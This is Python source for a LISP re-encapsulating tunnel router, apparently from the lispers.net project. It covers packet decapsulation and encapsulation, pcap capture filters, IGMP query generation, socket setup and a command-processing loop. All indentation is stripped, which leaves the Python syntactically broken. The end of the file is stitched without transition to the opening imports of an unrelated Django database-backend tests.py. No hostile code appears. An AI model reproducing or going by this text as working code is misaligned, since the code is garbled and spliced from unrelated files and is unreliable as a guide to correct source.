packet.packet = lisp.lisp_mac_input(packet.packet)
if (packet.packet == None): return
packet.encap_port = lisp.LISP_VXLAN_DATA_PORT
elif (packet.inner_version == 4):
igmp, packet.packet = lisp.lisp_ipv4_input(packet.packet)
if (packet.packet == None): return
packet.inner_ttl = packet.outer_ttl
elif (packet.inner_version == 6):
packet.packet = lisp.lisp_ipv6_input(packet)
if (packet.packet == None): return
packet.inner_ttl = packet.outer_ttl
else:
lisp.dprint("Cannot parse inner packet header")
return
#endif
#
# Process decap node trace function.
#
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet, ed="decap") == False): return
packet.outer_source.afi = lisp.LISP_AFI_NONE
packet.outer_dest.afi = lisp.LISP_AFI_NONE
#endif
#
# Should we glean source information from the packet and add it to the
# map-cache?
#
allow, x, y = lisp.lisp_allow_gleaning(packet.inner_source, None,
packet.outer_source)
if (allow):
igmp_packet = packet.packet if (igmp) else None
lisp.lisp_glean_map_cache(packet.inner_source, packet.outer_source,
packet.udp_sport, igmp_packet)
if (igmp): return
#endif
#
# If the destination is gleaned, we should suppress a mapping-system
# lookup.
#
deid = packet.inner_dest
if (deid.is_multicast_address()):
if (deid.is_link_local_multicast()):
deid_str = lisp.green(deid.print_address(), False)
lisp.dprint("Drop link-local multicast EID {}".format(deid_str))
return
#endif
gleaned_dest = False
x, y, z = lisp.lisp_allow_gleaning(packet.inner_source, deid, None)
else:
gleaned_dest, x, y = lisp.lisp_allow_gleaning(deid, None, None)
#endif
packet.gleaned_dest = gleaned_dest
#
# Do map-cache lookup. If no entry found, send Map-Request.
#
mc = lisp.lisp_map_cache_lookup(packet.inner_source, packet.inner_dest)
if (mc): mc.add_recent_source(packet.inner_source)
#
# Check if we are doing secondary instance-IDs, but only when we have a
# map-cache entry in this IID indicating a possible non-LISP site.
#
if (mc and (mc.action == lisp.LISP_NATIVE_FORWARD_ACTION or
mc.eid.address == 0)):
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)
if (db and db.secondary_iid):
dest_eid = packet.inner_dest
dest_eid.instance_id = db.secondary_iid
mc = lisp.lisp_map_cache_lookup(packet.inner_source, dest_eid)
if (mc):
packet.gleaned_dest = mc.gleaned
mc.add_recent_source(packet.inner_source)
else:
gleaned_dest, x, y = lisp.lisp_allow_gleaning(dest_eid, None,
None)
packet.gleaned_dest = gleaned_dest
#endif
#endif
#endif
#
# Map-cache lookup miss. Do not send Map-Request to mapping system if
# dest-EID is configured to be gleaned. We want to give preference to
# the gleaned mapping and not the mapping in the mapping system.
#
if (mc == None and gleaned_dest):
lisp.lprint("Suppress Map-Request for gleaned EID {}".format( \
lisp.green(packet.inner_dest.print_address(), False)))
return
#endif
if (mc == None or mc.action == lisp.LISP_SEND_MAP_REQUEST_ACTION):
if (lisp.lisp_rate_limit_map_request(packet.inner_dest)): return
lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
packet.inner_source, packet.inner_dest, None)
if (packet.is_trace()):
s = lisp_trace_listen_socket
r = "map-cache miss"
lisp.lisp_trace_append(packet, reason=r, lisp_socket=s)
#endif
return
#endif
#
# Send a Map-Request to see if there is an RLOC change or to refresh an
# entry that is about to time out.
#
if (mc and mc.refresh()):
if (lisp.lisp_rate_limit_map_request(packet.inner_dest) == False):
lisp.lprint("Refresh map-cache entry {}".format( \
lisp.green(mc.print_eid_tuple(), False)))
lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
packet.inner_source, packet.inner_dest, None)
#endif
#endif
#
# Update stats for the entry. Per-RLOC stats are done in
# lisp_mapping.select_rloc().
#
mc.last_refresh_time = time.time()
mc.stats.increment(len(packet.packet))
#
# Encapsulate or native forward packet.
#
dest_rloc, dest_port, nonce, action, rle, rloc_entry = \
mc.select_rloc(packet, None)
if (dest_rloc == None and rle == None):
if (action == lisp.LISP_NATIVE_FORWARD_ACTION):
lisp.dprint("Natively forwarding")
packet.send_packet(lisp_raw_socket, packet.inner_dest)
if (packet.is_trace()):
s = lisp_trace_listen_socket
r = "not an EID"
lisp.lisp_trace_append(packet, reason=r, lisp_socket=s)
#endif
lisp_latency_debug(ts, "RTR")
return
#endif
r = "No reachable RLOCs found"
lisp.dprint(r)
if (packet.is_trace()):
s = lisp_trace_listen_socket
lisp.lisp_trace_append(packet, reason=r, lisp_socket=s)
#endif
return
#endif
if (dest_rloc and dest_rloc.is_null()):
lisp.dprint("Drop action RLOC found")
if (packet.is_trace()):
s = lisp_trace_listen_socket
r = "drop action"
lisp.lisp_trace_append(packet, reason=r, lisp_socket=s)
#endif
return
#endif
#
# Set up the outer header for either unicast or multicast transmission.
#
packet.outer_tos = packet.inner_tos
packet.outer_ttl = packet.inner_ttl
#
# Do unicast encapsulation.
#
if (dest_rloc):
packet.encap_port = dest_port
if (dest_port == 0): packet.encap_port = lisp.LISP_DATA_PORT
packet.outer_dest.copy_address(dest_rloc)
version = packet.outer_dest.afi_to_version()
packet.outer_version = version
source_rloc = lisp_rtr_source_rloc if (version == 4) else \
lisp.lisp_myrlocs[1]
packet.outer_source.copy_address(source_rloc)
if (packet.is_trace()):
s = lisp_trace_listen_socket
if (lisp.lisp_trace_append(packet, rloc_entry=rloc_entry,
lisp_socket=s) == False): return
#endif
#
# Encode new LISP, UDP, and outer header.
#
if (packet.encode(nonce) == None): return
if (len(packet.packet) <= 1500): packet.print_packet("Send", True)
#
# Send out on raw socket.
#
raw_socket = lisp_raw_v6_socket if version == 6 else lisp_raw_socket
packet.send_packet(raw_socket, packet.outer_dest)
elif (rle):
#
# Do replication if an RLE is returned.
#
orig_len = len(packet.packet)
for node in rle.rle_forwarding_list:
packet.outer_dest.copy_address(node.address)
packet.encap_port = lisp.LISP_DATA_PORT if \
node.translated_port == 0 else node.translated_port
version = packet.outer_dest.afi_to_version()
packet.outer_version = version
source_rloc = lisp_rtr_source_rloc if (version == 4) else \
lisp.lisp_myrlocs[1]
packet.outer_source.copy_address(source_rloc)
if (packet.is_trace()):
s = lisp_trace_listen_socket
r = "replicate"
if (lisp.lisp_trace_append(packet, reason=r, lisp_socket=s) \
== False): return
#endif
if (packet.encode(None) == None): return
packet.print_packet("Replicate-to-L{}".format(node.level), True)
packet.send_packet(lisp_raw_socket, packet.outer_dest)
#
# We need to strip the encapsulation header so we can add a new
# one for the next replication.
#
strip_len = len(packet.packet) - orig_len
packet.packet = packet.packet[strip_len::]
if (lisp.lisp_flow_logging): packet = copy.deepcopy(packet)
#endfor
#endif
#
# Don't need packet structure anymore.
#
del(packet)
lisp_latency_debug(ts, "RTR")
return
#enddef
#
# lisp_rtr_worker_thread
#
# This function runs for each thread started.
#
def lisp_rtr_worker_thread(lisp_thread):
lisp.lisp_set_exception()
while (True):
#
# Dequeue packet from pcap's enqueue.
#
packet = lisp_thread.input_queue.get()
#
# Count input packets and bytes.
#
lisp_thread.input_stats.increment(len(packet))
#
# Use pre-defined packet data structure, store packet buffer in it.
#
lisp_thread.lisp_packet.packet = packet
#
# Decap and encap, go, go, go.
#
lisp_rtr_data_plane(lisp_thread.lisp_packet, lisp_thread.thread_name)
#endwhile
return
#enddef
#
# lisp_triage
#
# Decide which RTR thread should process the packet. Do a modulus on the
# timestamp to randomly have a single thread process a received packet.
#
def lisp_triage(thread):
seed = (time.time() % thread.number_of_pcap_threads)
return(int(seed) == thread.thread_number)
#enddef
#
# lisp_rtr_pcap_process_packet
#
# Receive a LISP encapsulated packet from pcap.loop(). IPC it to ourselves so
# the main thread can get access to lisp.lisp_map_cache.
#
def lisp_rtr_pcap_process_packet(parms, not_used, packet):
if (lisp_triage(parms[1]) == False): return
device = parms[0]
lisp_thread = parms[1]
use_workers = lisp_thread.number_of_worker_threads
lisp_thread.input_stats.increment(len(packet))
#
# Jump over the MAC header if the packet was received on an interface.
# Loopback interfaces have a 4-byte internal header instead.
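# The offsets below appear to correspond to a 4-byte null/loopback header
# on "lo0", a 14-byte Ethernet header on macOS captures, and a 16-byte
# Linux cooked-capture header for the "any" device.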
#
offset = 4 if device == "lo0" else (14 if lisp.lisp_is_macos() else 16)
packet = packet[offset::]
#
# If we are using worker threads, queue the packet so they can process it.
#
if (use_workers):
index = lisp_thread.input_stats.packet_count % use_workers
index = index + (len(lisp_threads) - use_workers)
thread = lisp_threads[index]
thread.input_queue.put(packet)
else:
lisp_thread.lisp_packet.packet = packet
lisp_rtr_data_plane(lisp_thread.lisp_packet, lisp_thread.thread_name)
#endif
return
#enddef
#
# lisp_rtr_pcap_thread
#
# Set up pcap filters for this thread to receive packets in
# lisp_rtr_pcap_process_packet().
#
def lisp_rtr_pcap_thread(lisp_thread):
lisp.lisp_set_exception()
if (lisp.lisp_myrlocs[0] == None): return
device = "lo0" if lisp.lisp_is_macos() else "any"
pcap = pcappy.open_live(device, 9000, 0, 100)
#
# If "lisp-nat = yes" is configured, then a PETR is co-located with this
# RTR functionality. We need to pcap *all* packets (0.0.0.0/0 and 0::/0).
#
lisp_nat = commands.getoutput("egrep 'lisp-nat = yes' ./lisp.config")
lisp_nat = (lisp_nat != "" and lisp_nat[0] == " ")
pfilter = "(dst host "
afilter = ""
for addr in lisp.lisp_get_all_addresses():
pfilter += "{} or ".format(addr)
afilter += "{} or ".format(addr)
#endfor
pfilter = pfilter[0:-4]
pfilter += ") and ((udp dst port 4341 or 8472 or 4789) or "
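# The "proto 17" clause below matches IPv4 fragments of UDP packets (MF
# bit set or a non-zero fragment offset) so lisp_reassemble() sees them.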
pfilter += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + \
"(ip[6]&0xe0 == 0 and ip[7] != 0))))"
#
# Also match RLOC-probe messages that come via the pcap interface so we
# have the IP header to grab the TTL from.
#
afilter = afilter[0:-4]
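# In the filter below, ip[28] is the first UDP payload byte, i.e. the LISP
# control header type byte: 0x12 is an RLOC-probe Map-Request and 0x28 is
# an RLOC-probe Map-Reply.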
pfilter += (" or (not (src host {}) and " + \
"((udp src port 4342 and ip[28] == 0x28) or " + \
"(udp dst port 4342 and ip[28] == 0x12)))").format(afilter)
if (lisp_nat):
pfilter += (" or (dst net 0.0.0.0/0 and " + \
"not (host {} or src net 127.0.0.0/8))").format(afilter)
#endif
lisp.lprint("Capturing packets for: '{}'".format(pfilter))
pcap.filter = pfilter
#
# Enter receive loop.
#
pcap.loop(-1, lisp_rtr_pcap_process_packet, [device, lisp_thread])
return
#enddef
#
# lisp_encapsulate_igmp_query
#
# LISP encapsulate an IGMP query to the RLOC of the EID that has joined any
# group.
#
def lisp_encapsulate_igmp_query(lisp_raw_socket, eid, geid, igmp):
#
# Setup fields we need for lisp_packet.encode().
#
packet = lisp.lisp_packet(igmp)
#
# Get RLOC of EID from RLE record.
#
mc = lisp.lisp_map_cache_lookup(eid, geid)
if (mc == None): return
if (mc.rloc_set == []): return
if (mc.rloc_set[0].rle == None): return
eid_name = eid.print_address_no_iid()
for rle_node in mc.rloc_set[0].rle.rle_nodes:
if (rle_node.rloc_name == eid_name):
packet.outer_dest.copy_address(rle_node.address)
packet.encap_port = rle_node.translated_port
break
#endif
#endfor
if (packet.outer_dest.is_null()): return
packet.outer_source.copy_address(lisp.lisp_myrlocs[0])
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 32
packet.inner_source.copy_address(lisp.lisp_myrlocs[0])
packet.inner_dest.store_address("[{}]224.0.0.1".format(geid.instance_id))
packet.inner_ttl = 1
e = lisp.green(eid.print_address(), False)
r = lisp.red("{}:{}".format(packet.outer_dest.print_address_no_iid(),
packet.encap_port), False)
q = lisp.bold("IGMP Query", False)
lisp.lprint("Data encapsulate {} to gleaned EID {}, RLOC {}".format( \
q, e, r))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
packet.send_packet(lisp_raw_socket, packet.outer_dest)
#enddef
#
# lisp_send_igmp_queries
#
# Send a General Query to each EID that has joined groups. The Group Address
# field below is set to 0.0.0.0 and the Number of Sources is set to 0.
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 0x11 | Max Resp Code | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Group Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Resv |S| QRV | QQIC | Number of Sources (N) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source Address [1] |
# +- -+
# . . .
# . . .
# +- -+
# | Source Address [N] |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_send_igmp_queries(lisp_raw_socket):
if (lisp.lisp_gleaned_groups == {}): return
#
# Build an IP header and checksum it. Put Router-Alert option after
# destination address.
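# The header built below is: version/IHL 0x46 (a 24-byte header including
# the Router-Alert option), TOS 0xc0, total length 36, DF set, TTL 1,
# protocol 2 (IGMP), a zero checksum filled in by lisp_ip_checksum(),
# then the source RLOC, destination 224.0.0.1, and the 4-byte
# Router-Alert option 0x94040000.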
#
ip = "\x46\xc0\x00\x24\x00\x00\x40\x00\x01\x02\x00\x00"
myrloc = lisp.lisp_myrlocs[0]
rloc = myrloc.address
ip += chr((rloc >> 24) & 0xff)
ip += chr((rloc >> 16) & 0xff)
ip += chr((rloc >> 8) & 0xff)
ip += chr(rloc & 0xff)
ip += "\xe0\x00\x00\x01"
ip += "\x94\x04\x00\x00"
ip = lisp.lisp_ip_checksum(ip, 24)
#
# Build an IGMP query and checksum it. The mrc is 100 (10 secs), qrv is 2,
# and qqic is 60. Just like cisco would send.
#
igmp = "\x11\x64\x00\x00" + "\x00\x00\x00\x00" + "\x02\x3c\x00\x00"
igmp = lisp.lisp_igmp_checksum(igmp)
#
# Send to EIDs that have joined group and that we have configured to send
# queries to.
#
seid = lisp.lisp_address(lisp.LISP_AFI_IPV4, "", 32, 0)
geid = lisp.lisp_address(lisp.LISP_AFI_IPV4, "", 32, 0)
for eid in lisp.lisp_gleaned_groups:
seid.store_address(eid)
for group in lisp.lisp_gleaned_groups[eid]:
geid.store_address(group)
x, y, query = lisp.lisp_allow_gleaning(seid, geid, None)
if (query == False): continue
lisp_encapsulate_igmp_query(lisp_raw_socket, seid, geid, ip + igmp)
#endfor
#endfor
#enddef
#
# lisp_timeout_gleaned_groups
#
# Go through the lisp_gleaned_groups{} array to see if any timers are older
# than 3 minutes.
#
def lisp_timeout_gleaned_groups():
seid = lisp.lisp_address(lisp.LISP_AFI_IPV4, "", 32, 0)
geid = lisp.lisp_address(lisp.LISP_AFI_IPV4, "", 32, 0)
delete_list = []
for eid in lisp.lisp_gleaned_groups:
for group in lisp.lisp_gleaned_groups[eid]:
last_refresh = lisp.lisp_gleaned_groups[eid][group]
elapsed = time.time() - last_refresh
if (elapsed < lisp.LISP_IGMP_TIMEOUT_INTERVAL): continue
delete_list.append([eid, group])
#endfor
#endfor
#
# Remove from the rloc-set and lisp_gleaned_groups (since we are not
# traversing it anymore).
#
to_str = lisp.bold("timed out", False)
for eid, group in delete_list:
seid.store_address(eid)
geid.store_address(group)
e = lisp.green(eid, False)
g = lisp.green(group, False)
lisp.lprint("{} RLE {} for gleaned group {}".format(e, to_str, g))
lisp.lisp_remove_gleaned_multicast(seid, geid)
#endfor
#enddef
#
# lisp_rtr_process_timer
#
# Call general timeout routine to process the RTR map-cache.
#
def lisp_rtr_process_timer(lisp_raw_socket):
lisp.lisp_set_exception()
#
# Remove nonce entries from crypto-list.
#
for keys in lisp.lisp_crypto_keys_by_nonce.values():
for key in keys: del(key)
#endfor
lisp.lisp_crypto_keys_by_nonce.clear()
lisp.lisp_crypto_keys_by_nonce = {}
#
# Walk map-cache.
#
lisp.lisp_timeout_map_cache(lisp.lisp_map_cache)
#
# Clear the LISP-Trace cache so we can optimize memory usage. There is only
# a one-time use for the cached entries.
#
lisp.lisp_rtr_nat_trace_cache.clear()
lisp.lisp_rtr_nat_trace_cache = {}
#
# Process gleaned groups refresh timer. If IGMP reports have not been
# received, remove RLE from (*,G) and (S,G) map-cache entries.
#
lisp_timeout_gleaned_groups()
#
# Send IGMP queries to gleaned EIDs that have joined groups.
#
lisp_send_igmp_queries(lisp_raw_socket)
#
# Restart periodic timer.
#
lisp_periodic_timer = threading.Timer(60, lisp_rtr_process_timer,
[lisp_raw_socket])
lisp_periodic_timer.start()
return
#enddef
#
# lisp_rtr_startup
#
# Initialize this LISP RTR process. Returns False on failure, True otherwise.
#
def lisp_rtr_startup():
global lisp_ipc_listen_socket, lisp_send_sockets, lisp_ephem_listen_socket
global lisp_raw_socket, lisp_raw_v6_socket, lisp_threads
global lisp_ipc_punt_socket, lisp_trace_listen_socket
global lisp_rtr_source_rloc
lisp.lisp_i_am("rtr")
lisp.lisp_set_exception()
lisp.lisp_print_banner("RTR starting up")
#
# Get local address for source RLOC for encapsulation.
#
if (lisp.lisp_get_local_addresses() == False): return(False)
#
# Get the interface address for the RTR source RLOC when running on AWS. It
# should be the private translatable address from an AWS-resident NAT.
#
# Try a list of known device names since some AWS VMs may not have interface
# "eth0" but something like "ens5".
#
lisp_rtr_source_rloc = lisp.lisp_myrlocs[0]
if (lisp.lisp_on_aws()):
aws = lisp.bold("AWS RTR", False)
rloc = None
for device in ["eth0", "ens5"]:
rloc = lisp.lisp_get_interface_address(device)
if (rloc != None): break
#endfor
if (rloc != None):
lisp_rtr_source_rloc = rloc
addr = rloc.print_address_no_iid()
lisp.lprint("{} using RLOC {} on {}".format(aws, addr, device))
else:
addr = lisp_rtr_source_rloc.print_address_no_iid()
lisp.lprint("{} cannot obtain RLOC, using {}".format(aws, addr))
#endif
#endif
#
# Open network send socket and internal listen socket. For an RTR that
# may be behind a NAT, all Map-Requests are sent with the ephemeral port
# so the Map-Request port and the ECM port will be the same.
#
address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
lisp_ephem_listen_socket = lisp.lisp_open_listen_socket(address,
str(lisp_ephem_port))
lisp_ipc_listen_socket = lisp.lisp_open_listen_socket("", "lisp-rtr")
lisp_ipc_punt_socket = lisp.lisp_open_listen_socket("", "lispers.net-itr")
lisp_send_sockets[0] = lisp_ephem_listen_socket
# lisp_send_sockets[0] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV4)
lisp_send_sockets[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
lisp_send_sockets[2] = lisp_ipc_listen_socket
#
# Open up raw socket so we can send with IP headers after decapsulation.
# There is a special case where the RTR's lisp_send_sockets array is of
# size 4 since we need to pass the raw socket through the lisp.py module
# to send a data encapsulated RLOC-probe to an ETR that sits behind a NAT.
# The test is in lisp_send_map_request() for this. This is the case in
# ETRs as well. All other components use an array size of 3.
#
lisp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_RAW)
lisp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
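# IP_HDRINCL means we supply the complete IP header ourselves on this raw
# socket rather than having the kernel build it.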
lisp_send_sockets.append(lisp_raw_socket)
#
# Open up a listen socket on the LISP-Trace port so the RTR can cache
# translated RLOC information from an ltr client program.
#
lisp_trace_listen_socket = lisp.lisp_open_listen_socket("0.0.0.0",
str(lisp.LISP_TRACE_PORT))
if (lisp.lisp_is_raspbian() == False):
lisp_raw_v6_socket = socket.socket(socket.AF_INET6, socket.SOCK_RAW,
socket.IPPROTO_UDP)
#endif
pcap_threads = os.getenv("LISP_PCAP_THREADS")
pcap_threads = 1 if (pcap_threads == None) else int(pcap_threads)
worker_threads = os.getenv("LISP_WORKER_THREADS")
worker_threads = 0 if (worker_threads == None) else int(worker_threads)
#
# Setup packet capture.
#
for i in range(pcap_threads):
t = lisp.lisp_thread("pcap-{}".format(i))
t.thread_number = i
t.number_of_pcap_threads = pcap_threads
t.number_of_worker_threads = worker_threads
lisp_threads.append(t)
threading.Thread(target=lisp_rtr_pcap_thread, args=[t]).start()
#endfor
#
# Start worker threads. The number of them comes from the LISP_WORKER_THREADS
# environment variable read above.
#
for i in range(worker_threads):
t = lisp.lisp_thread("worker-{}".format(i))
lisp_threads.append(t)
threading.Thread(target=lisp_rtr_worker_thread, args=[t]).start()
#endfor
#
# Load map-cache from checkpoint file before we start writing to it.
#
lisp.lisp_load_checkpoint()
#
# Should we load-split pings?
#
lisp.lisp_load_split_pings = (os.getenv("LISP_LOAD_SPLIT_PINGS") != None)
#
# Start map-cache timeout timer.
#
lisp_periodic_timer = threading.Timer(60, lisp_rtr_process_timer,
[lisp_raw_socket])
lisp_periodic_timer.start()
return(True)
#enddef
#
# lisp_rtr_shutdown
#
# Shut down this process.
#
def lisp_rtr_shutdown():
#
# Close sockets.
#
lisp.lisp_close_socket(lisp_send_sockets[0], "")
lisp.lisp_close_socket(lisp_send_sockets[1], "")
lisp.lisp_close_socket(lisp_ipc_listen_socket, "lisp-rtr")
lisp.lisp_close_socket(lisp_ephem_listen_socket, "")
lisp.lisp_close_socket(lisp_trace_listen_socket, "")
lisp.lisp_close_socket(lisp_ipc_punt_socket, "lispers.net-itr")
lisp_raw_socket.close()
return
#enddef
#
# lisp_rtr_map_resolver_command
#
# Call lispconfig.lisp_map_resolver_command and set "test-mr" timer.
#
def lisp_rtr_map_resolver_command(kv_pair):
global lisp_send_sockets
global lisp_ephem_port
lispconfig.lisp_map_resolver_command(kv_pair)
if (lisp.lisp_test_mr_timer == None or
lisp.lisp_test_mr_timer.is_alive() == False):
lisp.lisp_test_mr_timer = threading.Timer(2, lisp.lisp_test_mr,
[lisp_send_sockets, lisp_ephem_port])
lisp.lisp_test_mr_timer.start()
#endif
return
#enddef
#
# lisp_rtr_xtr_command
#
# Call lispconfig.lisp_xtr_command() but pass socket parameters to start
# the RLOC-probing timer if "rloc-probing = yes".
#
def lisp_rtr_xtr_command(kv_pair):
global lisp_ephem_listen_socket, lisp_raw_socket, lisp_ephem_port
rloc_probing = lisp.lisp_rloc_probing
#
# Execute command.
#
lispconfig.lisp_xtr_command(kv_pair)
#
# Trigger if "rloc-probing = yes" just happened and it was previously
# set to "no".
#
if (rloc_probing == False and lisp.lisp_rloc_probing):
lisp_sockets = [lisp_ephem_listen_socket, lisp_ephem_listen_socket,
None, lisp_raw_socket]
lisp.lisp_start_rloc_probe_timer(1, lisp_sockets)
entry = { "type" : "itr-crypto-port", "port" : lisp_ephem_port }
lisp.lisp_write_to_dp_socket(entry)
#endif
#
# Write to external data-plane if enabled.
#
lisp.lisp_ipc_write_xtr_parameters(lisp.lisp_debug_logging,
lisp.lisp_data_plane_logging)
return
#enddef
#
# RTR commands processed by this process.
#
lisp_rtr_commands = {
"lisp xtr-parameters" : [lisp_rtr_xtr_command, {
"rloc-probing" : [True, "yes", "no"],
"nonce-echoing" : [True, "yes", "no"],
"data-plane-security" : [True, "yes", "no"],
"data-plane-logging" : [True, "yes", "no"],
"frame-logging" : [True, "yes", "no"],
"flow-logging" : [True, "yes", "no"],
"nat-traversal" : [True, "yes", "no"],
"checkpoint-map-cache" : [True, "yes", "no"],
"ipc-data-plane" : [True, "yes", "no"],
"decentralized-push-xtr" : [True, "yes", "no"],
"decentralized-pull-xtr-modulus" : [True, 1, 0xff],
"decentralized-pull-xtr-dns-suffix" : [True],
"register-reachable-rtrs" : [True, "yes", "no"],
"program-hardware" : [True, "yes", "no"] }],
"lisp interface" : [lispconfig.lisp_interface_command, {
"interface-name" : [True],
"device" : [True],
"instance-id" : [True, 0, 0xffffffff],
"dynamic-eid" : [True],
"dynamic-eid-device" : [True],
"lisp-nat" : [True, "yes", "no"],
"dynamic-eid-timeout" : [True, 0, 0xff] }],
"lisp map-resolver" : [lisp_rtr_map_resolver_command, {
"mr-name" : [True],
"ms-name" : [True],
"dns-name" : [True],
"address" : [True] }],
"lisp map-cache" : [lispconfig.lisp_map_cache_command, {
"prefix" : [],
"mr-name" : [True],
"ms-name" : [True],
"instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"send-map-request" : [True, "yes", "no"],
"rloc" : [],
"rloc-record-name" : [True],
"rle-name" : [True],
"elp-name" : [True],
"address" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp rtr-map-cache" : [lispconfig.lisp_map_cache_command, {
"prefix" : [],
"instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"rloc" : [],
"rloc-record-name" : [True],
"rle-name" : [True],
"elp-name" : [True],
"address" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp explicit-locator-path" : [lispconfig.lisp_elp_command, {
"elp-name" : [False],
"elp-node" : [],
"address" : [True],
"probe" : [True, "yes", "no"],
"strict" : [True, "yes", "no"],
"eid" : [True, "yes", "no"] }],
"lisp replication-list-entry" : [lispconfig.lisp_rle_command, {
"rle-name" : [False],
"rle-node" : [],
"address" : [True],
"level" : [True, 0, 255] }],
"lisp json" : [lispconfig.lisp_json_command, {
"json-name" : [False],
"json-string" : [False] }],
"lisp database-mapping" : [lisp_rtr_database_mapping_command, {
"prefix" : [],
"mr-name" : [True],
"ms-name" : [True],
"instance-id" : [True, 0, 0xffffffff],
"secondary-instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"dynamic-eid" : [True, "yes", "no"],
"signature-eid" : [True, "yes", "no"],
"rloc" : [],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"address" : [True],
"interface" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp glean-mapping" : [lisp_rtr_glean_mapping_command, {
"instance-id" : [False],
"eid-prefix" : [True],
"group-prefix" : [True],
"rloc-prefix" : [True],
"rloc-probe" : [True, "yes", "no"],
"igmp-query" : [True, "yes", "no"] }],
"show rtr-rloc-probing" : [lisp_rtr_show_rloc_probe_command, { }],
"show rtr-keys" : [lisp_rtr_show_keys_command, {}],
"show rtr-map-cache" : [lisp_rtr_show_command, {}],
"show rtr-map-cache-dns" : [lisp_rtr_show_command_dns, {}]
}
#
# lisp_rtr_process_trace_packet
#
# Process RLOC-based LISP-Trace message.
#
def lisp_rtr_process_trace_packet(lisp_socket):
#
# Read from listen socket for port 2434 and parse LISP-Trace packet.
#
opcode, source, port, packet = lisp.lisp_receive(lisp_socket, False)
trace = lisp.lisp_trace()
if (trace.decode(packet) == False): return
#
# Cache the translated information. Will use local addressing info to
# find translated information in lisp_trace_append().
#
trace.rtr_cache_nat_trace(source, port)
#enddef
#------------------------------------------------------------------------------
#
# Main entry point for process.
#
if (lisp_rtr_startup() == False):
lisp.lprint("lisp_rtr_startup() failed")
lisp.lisp_print_banner("RTR abnormal exit")
exit(1)
#endif
socket_list = [lisp_ephem_listen_socket, lisp_ipc_listen_socket,
lisp_ipc_punt_socket, lisp_trace_listen_socket]
ephem_sockets = [lisp_ephem_listen_socket] * 3
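# This appears to mirror the 3-element [IPv4, IPv6, IPC] socket layout that
# lisp_parse_packet() expects, reusing the ephemeral socket in every slot.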
while (True):
try: ready_list, w, x = select.select(socket_list, [], [])
except: break
#
# Process Punt signal message from another data-plane (snabb).
#
if (lisp.lisp_ipc_data_plane and lisp_ipc_punt_socket in ready_list):
lisp.lisp_process_punt(lisp_ipc_punt_socket, lisp_send_sockets,
lisp_ephem_port)
#endif
#
# LISP-TRACE messages coming from an ltr client program.
#
if (lisp_trace_listen_socket in ready_list):
lisp_rtr_process_trace_packet(lisp_trace_listen_socket)
#endif
#
# Process Map-Reply messages received on ephemeral port.
#
if (lisp_ephem_listen_socket in ready_list):
opcode, source, port, packet = lisp.lisp_receive(ephem_sockets[0],
False)
if (source == ""): break
if (lisp.lisp_is_rloc_probe_request(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe request, using pcap")
continue
#endif
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe reply, using pcap")
continue
#endif
lisp.lisp_parse_packet(ephem_sockets, packet, source, port)
#endif
#
# Process either commands, an IPC data-packet (for testing), or any
# protocol message on the IPC listen socket.
#
if (lisp_ipc_listen_socket in ready_list):
opcode, source, port, packet = \
lisp.lisp_receive(lisp_ipc_listen_socket, True)
if (source == ""): break
if (opcode == "command"):
if (packet == "clear"):
lisp.lisp_clear_map_cache()
continue
#endif
if (packet.find("clear%") != -1):
lispconfig.lisp_clear_decap_stats(packet)
continue
#endif
lispconfig.lisp_process_command(lisp_ipc_listen_socket, opcode,
packet, "lisp-rtr", [lisp_rtr_commands])
elif (opcode == "api"):
lisp.lisp_process_api("lisp-rtr", lisp_ipc_listen_socket, packet)
elif (opcode == "data-packet"):
lisp_rtr_data_plane(packet, "")
else:
if (lisp.lisp_is_rloc_probe_request(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe request, using pcap")
continue
#endif
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe reply, using pcap")
continue
#endif
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port)
#endif
#endif
#endwhile
lisp_rtr_shutdown()
lisp.lisp_print_banner("RTR normal exit")
exit(0)
#------------------------------------------------------------------------------
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import unicode_literals
import copy
import datetime
import re
import threading
import unittest
import warnings
from decimal import Decimal, Rounded
from django.conf import settings
